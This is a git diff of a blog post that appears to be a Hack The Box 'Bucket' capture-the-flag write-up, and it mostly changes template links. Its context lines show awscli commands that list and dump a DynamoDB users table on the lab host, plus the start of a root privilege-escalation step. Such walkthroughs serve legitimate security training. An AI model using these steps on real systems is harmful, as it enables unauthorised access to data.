--- a/_posts/2020-10-20-bucket.md
+++ b/_posts/2020-10-20-bucket.md
@@ -77,7 +77,7 @@ PORT   STATE SERVICE VERSION
 - `s3.bucket.htb/shell/` revealed a interactive `DynamoDB JavaScript Shell` .
 - using this shell we can talk to the backend database service and dump data from the server .
 - heading to the `API Templates` tab i found some prebuilt templates .
-- i read [API Docs](https://docs.aws.amazon.com/AmazonS3/latest/API/Welcome.html) and build my own [simple templates](awsApiTmpl) .
+- i read [API Docs](https://docs.aws.amazon.com/AmazonS3/latest/API/Welcome.html) and build my own [simple templates](https://github.com/x00tex/hackTheBox/tree/main/Boxes/linux/Retired/bucket/awsApiTmpl) .
 - reading through google i found a `awscli` tool similar as webshell but can run from the terminal, [tool](https://github.com/aws/aws-cli)
 
 ## awscli
@@ -97,7 +97,7 @@ PORT   STATE SERVICE VERSION
 
 ### Dump Data
 
-- **First**, find the table name, [template](awsApiTmpl/list-table.js) for webshell
+- **First**, find the table name
 
 	`aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ | jq -r .`
 
@@ -107,7 +107,7 @@ PORT   STATE SERVICE VERSION
     	  ]
 	  }
 
-- **Second**, scan `users` table, [template](awsApiTmpl/scan-tmpl.js) for webshell
+- **Second**, scan `users` table
 
 	`aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ | jq -r .`
 
@@ -447,7 +447,7 @@ else
 
 # Root Privesc
 
-**First**, create `alerts` table , [template](awsApiTmpl/createTable-tmpl.js) for webshell
+**First**, create `alerts` table
 ```bash
 aws dynamodb create-table \
     --table-name alerts \
@@ -460,7 +460,7 @@ aws dynamodb create-table \
         --endpoint-url=http://s3.bucket.htb
 ```
 
-**Second**, put `Ransomware` item , [template](awsApiTmpl/putItem-tmpl.js) for webshell
+**Second**, put `Ransomware` item
 ```bash
 aws dynamodb put-item \
 --table-name alerts  \
